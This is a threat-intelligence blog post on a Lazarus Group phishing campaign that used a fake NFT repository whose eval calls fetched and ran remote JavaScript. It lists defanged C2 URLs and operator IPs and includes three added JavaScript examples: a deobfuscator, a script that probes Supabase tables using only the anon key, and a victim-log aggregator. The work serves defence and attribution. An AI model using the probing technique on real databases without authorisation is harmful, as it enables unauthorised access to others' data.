Beyond the Pond Phish: Unraveling Lazarus Group's Evolving Tactics (BitMEX Blog)
The Lazarus Group is a prominent hacking group associated with the North Korean government, with a long history of targeting companies and individuals within the cryptocurrency space. They have been linked to the breaches of Phemex, WazirX, Bybit and Stake, among others.

Our security team frequently responds to attempts to attack us, many of which use techniques or infrastructure that have been tied to the Lazarus Group by other researchers.

A common pattern in their major operations is the use of relatively unsophisticated methods, often starting with phishing, to gain a foothold in their targets' systems.

For example, in the Bybit breach the group tricked a Safe{Wallet} employee into running malicious code on their computer to establish initial access. Once this foothold was obtained, what looks like a more sophisticated division of the group took over and continued post-exploitation, obtaining access to Safe's AWS account and modifying the wallet's frontend source code, which resulted in the ultimate theft of funds from their cold wallets.

Throughout the last few years it appears that the group has divided into multiple subgroups that are not necessarily of the same technical sophistication. This can be observed through the many documented examples of bad practices coming from the frontline groups that execute the social engineering attacks, when compared to the more sophisticated post-exploitation techniques applied in some of these known hacks.

Recently, a BitMEX employee was contacted through LinkedIn for a potential "NFT Marketplace" web3 project collaboration. This pretext was similar enough to other attacks common in this industry that the employee suspected it was an attempt to trick them into running malicious code on their device. They alerted the security team, who investigated with the objective of understanding how this campaign worked and how to protect ourselves from it.

The interaction is well known if you are familiar with Lazarus tactics. After some back and forth with the attacker,
our employee was invited to a private GitHub repository which contained code for a Next.js/React website. The goal was to make the victim run the project, which includes malicious code, on their computer. After a few minutes of inspecting the repository (really just grepping for eval), we found some very suspicious pieces of code.

The first instance of calls to the eval function was commented out, suggesting this code was used in a previous campaign or was an older version of the malicious code being distributed. If it were not commented out, it would send an HTTP request to hxxpregionchecknetapiuserthirdcookiev3726 and execute the response's cookie value. This domain has been previously attributed to the Lazarus Group by Palo Alto's Unit 42.

The second eval call we found was not commented out. The code here sends an HTTP request to hxxpfashdefistore6168defyv5 and executes the JavaScript code returned by the server.

We then sent this request out manually and saved its response for further analysis. The JavaScript code returned by the server was obfuscated, making it hard to analyse at a glance.

To understand what this is really doing we used webcrack, a JavaScript deobfuscation tool, which yields a slightly better, unminified version.

This JavaScript file looked like the result of joining three different scripts together. We can see multiple code blocks that separate the different stages of the malware.

At first glance, the second part of the script contained strings that were similar to what we would expect from a credential stealer: references to Chrome extension IDs and to other browsers.

This "pzi" string looked familiar to us as well. Even without deobfuscating the code, it is similar to other pieces of malware that have been previously tied to the DPRK, and resembles the BeaverTail campaign originally described by Palo Alto's Unit 42 in their report. Since Unit 42 has already extensively analysed this second component, we will not cover it here.
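The manual step that follows in the post (replacing references to a string array with their values) is the core of this kind of deobfuscation, so here is an added example of that transformation. It is an illustration written for this page, not the malware's code, not webcrack, and not a script from the original investigation. The obfuscated input is a constructed stand-in for the common "global string array plus offset decoder" pattern; the identifiers (_0x3f1a, _0x2c7d), the 0x1f3 offset and the strings are placeholders, not values from the real payload. Real samples often add array rotation or base64/RC4 encoding on top of this, which webcrack handles and this snippet deliberately does not.

```javascript
// Added example (not from the original post, and not webcrack): inline the
// "string array + offset decoder" pattern commonly emitted by JavaScript
// obfuscators. Everything in OBFUSCATED_SAMPLE is constructed; identifiers,
// offset and strings are placeholders, not the real payload's.
const OBFUSCATED_SAMPLE = [
  "var _0x3f1a = ['getItem', 'supabase', 'from', 'insert', 'hostname', 'userInfo'];",
  "function _0x2c7d(_0x55aa) { _0x55aa = _0x55aa - 0x1f3; return _0x3f1a[_0x55aa]; }",
  "const client = createClient(_0x2c7d(0x1f4) + '.co');",
  "db[_0x2c7d(0x1f5)]('victims')[_0x2c7d(0x1f6)]({ host: os[_0x2c7d(0x1f7)]() });",
].join('\n');

// Matches one single- or double-quoted JS string literal (with escapes).
const STRING_LIT = /'((?:\\.|[^'\\])*)'|"((?:\\.|[^"\\])*)"/g;

// Locate `var _0x.... = ['a', 'b', ...];` and pull out its string items.
function parseStringArray(src) {
  const m = src.match(/(?:var|let|const)\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]\s*;?/);
  if (!m) return null;
  const items = [...m[2].matchAll(STRING_LIT)].map(l => (l[1] !== undefined ? l[1] : l[2]));
  return { name: m[1], items, decl: m[0] };
}

// Locate the decoder `function _0xD(i) { i = i - OFFSET; return _0xARR[i]; }`
// and read the offset it subtracts before indexing the array.
function findDecoder(src, arrayName) {
  const re = new RegExp(
    String.raw`function\s+(_0x[0-9a-fA-F]+)\s*\((\w+)\)\s*\{\s*\2\s*=\s*\2\s*-\s*(0x[0-9a-fA-F]+|\d+)\s*;\s*return\s+` +
    arrayName + String.raw`\[\2\]\s*;?\s*\}`);
  const m = src.match(re);
  return m ? { name: m[1], offset: Number(m[3]), decl: m[0] } : null;
}

function deobfuscateStringArray(src) {
  const arr = parseStringArray(src);
  if (!arr) throw new Error('no string array found');
  const dec = findDecoder(src, arr.name);
  if (!dec) throw new Error(`no offset decoder found for ${arr.name}`);

  // 1. Replace every decoder call such as _0x2c7d(0x1f4) with the literal it resolves to.
  const callRe = new RegExp(dec.name + String.raw`\(\s*(0x[0-9a-fA-F]+|\d+)\s*\)`, 'g');
  let out = src.replace(callRe, (whole, idx) => {
    const i = Number(idx) - dec.offset;
    return i >= 0 && i < arr.items.length ? JSON.stringify(arr.items[i]) : whole; // leave unknown indices alone
  });
  // 2. Drop the now-unused array and decoder definitions.
  out = out.replace(arr.decl, '').replace(dec.decl, '');
  // 3. Turn obj["prop"] into obj.prop where the key is a valid identifier.
  out = out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
  return out.trim();
}

console.log(deobfuscateStringArray(OBFUSCATED_SAMPLE));
```

On the constructed input this yields `createClient("supabase" + '.co')` and `db.from('victims').insert({ host: os.hostname() })`, which is the point of the exercise: once the indirection is gone, the Supabase client calls and the host metadata being collected read directly off the page, and the string list itself is a ready source of IoCs.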
After getting confirmation of who we were dealing with, we decided to continue deobfuscating the code in an attempt to dig out some IoCs that could be added to our internal tools.

JavaScript deobfuscation is pretty fun once you know the patterns the obfuscation tools use, and usually boils down to finding and replacing references to string arrays or calls to decryption functions, and renaming variables. Starting from the first code block, we manually replaced all of the references to a string array with their corresponding values and used webcrack's symbol renaming tool to rename variables based on their context, which results in human-readable code.

As this was not our first time reverse engineering malware related to this kind of campaign, we were already reasonably familiar with the code. However, this initial part of the file was new to us: it connects to a Supabase instance and writes metadata (username, hostname, OS, IP, geolocation, time) about the computer that has been infected.

Supabase is a managed database service with a free tier, akin to Google's Firebase. It allows developers to quickly set up databases that have easy-to-use interfaces for applications, which, if configured properly, allow you to implement almost all functionality that would usually be tied to an API layer (authentication, access control, etc.) without the need for one.

A common issue with these services is that developers do not take the time to configure permissions properly and end up leaving significant parts of the database accessible to anyone. With this in mind, it was one of the first things we decided to test, using a simple script.

To our surprise, at the time this returned 37 records with data from computers that had previously been compromised.

If we take a closer look at the data, some logs stand out: a lot of username/hostname combinations are repeated, and some of those have patterns that look like test runs, potentially done by the developers. We also see a pattern of many hostnames of the form 3XXX.
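The script used for that test is not reproduced in the post. The following is an added example of the same check, written for this page rather than taken from the investigation: it queries a table through Supabase's PostgREST endpoint using only the project URL and anon key, which a client-side payload necessarily embeds, and classifies the result. The project ref, key and table name are placeholders, and the canned responses are constructed so the example runs offline. The practitioner caveat it encodes: a 200 response with an empty array does not prove the table is locked down, because row-level security enabled with no SELECT policy also returns an empty list rather than an error.

```javascript
// Added example (not the script from the original investigation): probe a
// Supabase table with nothing but the anon key. Project URL, key and table
// are placeholders; the canned responses below are constructed test data.

function buildProbeRequest({ projectUrl, anonKey, table, limit = 1000 }) {
  // PostgREST endpoint: /rest/v1/<table>?select=*  (anon key goes in both headers)
  return {
    url: `${projectUrl.replace(/\/$/, '')}/rest/v1/${encodeURIComponent(table)}?select=*&limit=${limit}`,
    headers: { apikey: anonKey, Authorization: `Bearer ${anonKey}` },
  };
}

function classifyProbeResponse(status, body) {
  if (status === 200 && Array.isArray(body)) {
    // Caveat: RLS enabled with no SELECT policy yields 200 [] rather than an
    // error, so an empty array is "nothing visible", not "properly secured".
    return body.length > 0
      ? { verdict: 'exposed', rows: body }
      : { verdict: 'no-rows', rows: [] };
  }
  if (status === 401 || status === 403) return { verdict: 'denied', rows: [], error: body };
  if (status === 404) return { verdict: 'missing', rows: [], error: body }; // wrong table name or schema
  return { verdict: 'error', rows: [], status, error: body };
}

async function probeSupabaseTable(cfg, fetchImpl = globalThis.fetch) {
  const { url, headers } = buildProbeRequest(cfg);
  const res = await fetchImpl(url, { headers });
  let body = null;
  try { body = await res.json(); } catch (_) { /* non-JSON body: classify by status alone */ }
  return classifyProbeResponse(res.status, body);
}

// Constructed stand-in for fetch() so the example runs offline. It mimics the
// response shapes for an open table, a locked table and a mistyped table name.
const CANNED = {
  victims: { status: 200, body: [
    { username: 'Victor', hostname: '3KZH', ip: '203.0.113.10' },
    { username: 'alice', hostname: 'MBP-alice', ip: '198.51.100.7' },
  ] },
  locked: { status: 401, body: { code: '42501', message: 'permission denied for table locked' } },
  nope:   { status: 404, body: { message: 'relation "public.nope" does not exist' } },
};
async function fakeFetch(url) {
  const table = decodeURIComponent(new URL(url).pathname.split('/').pop());
  const r = CANNED[table] || { status: 200, body: [] };
  return { status: r.status, json: async () => r.body };
}

// Placeholder project ref and key; pass the real fetch to probe a live instance.
const cfg = { projectUrl: 'https://placeholderprojectref.supabase.co', anonKey: 'anon-key-placeholder', table: 'victims' };
probeSupabaseTable(cfg, fakeFetch).then(r => console.log(r.verdict, r.rows.length, 'rows'));
```

For a live check, the anon key and project URL come straight out of the deobfuscated payload; if the table name is not obvious from the code, the `/rest/v1/` root with the same headers returns the OpenAPI description of whatever the anon role is allowed to see.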
The IP addresses logged for these entries mostly belong to VPN providers. One of the recurring usernames, Victor, consistently uses IP addresses that appear to be managed by Touch VPN, while GHOST72 uses IP addresses that map to Astrill VPN servers (source: spur.us).

By looking at the logs for Victor we found an entry that stands out: the IP address and location do not match the previously observed Touch VPN exit nodes, but rather a residential China Mobile IP address (22310414497) located in Jiaxing, China. We believe that this was an operational security mistake which ended up leaking the attacker's original IP address.

Once we had this information, we created a simple program that queries this database on a regular basis and logs new infections, with the goal of understanding the general profile of victims and potentially spotting new mistakes by the operators. This program has been running since May 14, 2025, and our data has all logs dating back to March 31st. So far this amounts to 856 entries with 174 unique user/hostname combinations.

[Chart: unique new infections by day (UTC)]

By looking at the username, hostname and IPs of past infections we were also able to identify other computers and accounts used to test or develop the malware used in this campaign.

With these hostnames in mind we can also plot a chart that shows active hours for the operators behind this campaign.

Interestingly, we identified a consistent period of downtime for the operators from 8am to 1pm UTC (5pm to 10pm Pyongyang time), which suggests that they do have a structured schedule or consistent working hours, with activity occurring throughout the rest of the 24-hour cycle.

Investigating this Lazarus Group campaign shows a stark contrast between their entry-level phishing strategies and advanced post-exploitation techniques. The accidental exposure of the Supabase database revealed not only their tracking methods but also significant lapses in operational security, such as the leakage of Chinese IP addresses, offering interesting insights about the inner workings of the group.
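The figures and charts above (unique user/hostname combinations, new infections per day, operator activity by hour and the quiet window) come from aggregating the rows pulled from the exposed table. As an added example, not code from the original investigation, here is that aggregation over constructed rows. The column names (username, hostname, ip, created_at) are an assumption about the table's schema, and the sample rows use documentation IP ranges rather than real victims; the repeat threshold for flagging likely operator or test machines is likewise a choice for this illustration.

```javascript
// Added example (not the program from the original post): aggregate victim
// rows into the views used in the analysis. Column names are assumed; the
// rows are constructed test data using documentation IP ranges.
const SAMPLE_ROWS = [
  { username: 'Victor', hostname: '3KZH',        ip: '203.0.113.10', created_at: '2025-05-01T14:05:00Z' },
  { username: 'Victor', hostname: '3KZH',        ip: '203.0.113.11', created_at: '2025-05-01T15:20:00Z' },
  { username: 'Victor', hostname: '3KZH',        ip: '203.0.113.12', created_at: '2025-05-02T02:40:00Z' },
  { username: 'alice',  hostname: 'MBP-alice',   ip: '198.51.100.7', created_at: '2025-05-01T16:00:00Z' },
  { username: 'bob',    hostname: 'bob-desktop', ip: '198.51.100.8', created_at: '2025-05-02T22:30:00Z' },
  { username: 'carol',  hostname: 'DESKTOP-TEST', ip: '198.51.100.9', created_at: 'not a date' }, // malformed timestamp
];

function analyseRecords(rows, minRepeats = 3) {
  const perKey = new Map();              // "user@host" -> { count, firstSeen }
  const byHour = new Array(24).fill(0);  // check-ins per UTC hour
  for (const r of rows) {
    const key = `${r.username}@${r.hostname}`;
    const entry = perKey.get(key) || { count: 0, firstSeen: null };
    entry.count += 1;
    const ts = new Date(r.created_at);
    if (!Number.isNaN(ts.getTime())) {   // rows with unparseable times still count as hosts
      byHour[ts.getUTCHours()] += 1;
      if (entry.firstSeen === null || ts < entry.firstSeen) entry.firstSeen = ts;
    }
    perKey.set(key, entry);
  }
  // New infections per day = first sighting of each user@host pair.
  const newPerDay = {};
  for (const { firstSeen } of perKey.values()) {
    if (!firstSeen) continue;
    const day = firstSeen.toISOString().slice(0, 10);
    newPerDay[day] = (newPerDay[day] || 0) + 1;
  }
  // Pairs that keep re-appearing look like operator or developer test machines.
  const suspectedOperators = [...perKey].filter(([, e]) => e.count >= minRepeats).map(([k]) => k);
  return { total: rows.length, uniqueHosts: perKey.size, newPerDay, byHour, suspectedOperators, quietWindow: quietWindow(byHour) };
}

// Longest run of zero-activity hours, allowed to wrap past midnight.
function quietWindow(byHour) {
  let best = { startHour: 0, hours: 0 };
  let run = 0;
  for (let i = 0; i < 48; i++) {
    if (byHour[i % 24] === 0) {
      run += 1;
      if (run > best.hours) best = { startHour: (i - run + 1) % 24, hours: Math.min(run, 24) };
    } else {
      run = 0;
    }
  }
  return best;
}

// Text version of the "active hours" chart.
function renderHours(byHour) {
  return byHour.map((n, h) => `${String(h).padStart(2, '0')}h |${'#'.repeat(n)}`).join('\n');
}

const summary = analyseRecords(SAMPLE_ROWS);
console.log(summary.uniqueHosts, 'unique user@host pairs;', summary.suspectedOperators, 'look like operators');
console.log('quiet window starts', summary.quietWindow.startHour + ':00 UTC for', summary.quietWindow.hours, 'hours');
console.log(renderHours(summary.byHour));
```

On real data, the quiet-window computation is what turns the hourly histogram into the 8am to 1pm UTC observation; it is worth running it only over the operator hostnames identified via suspectedOperators, since victim check-ins follow the victims' time zones, not the operators'.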
If you want to get in touch with us regarding this topic, or if the idea of working in an organisation that investigates these kinds of attacks interests you, contact securityresearch at bitmex dot com.

Indicators of compromise

Supabase URL: httpsmkswbddldpyiqkyusupabaseco

C2 URL: http1441729635

Threat actor Victor3KZH: 107182231193 107182231196 1202262228 1841745149 22310414497 311318910 3113189178 37120216226 3813414894 45141153154 89116158156 89116158164 89116158188 89116158228 8911615868

Threat actor Victor3KZH1: 107182231196 311318910 311318926 38132106130 45141153130 89116158156 89116158228 8911615868 8911615884

Threat actor GHOST723UJS2: 10818157127 195146531 19916811331 8918718511

Threat actor ghostGHOST3: 129232193253 195146531 209127117234 455619779

Threat actor GoldRockDESKTOPN4VEL23: 3817018110

Threat actor Lenovo3RKS: 3817018110

Threat actor Super3AHR2: 21713819834 89187161220

Threat actor degenAlli: 1678861148

Threat actor firebird3KJH: 14670632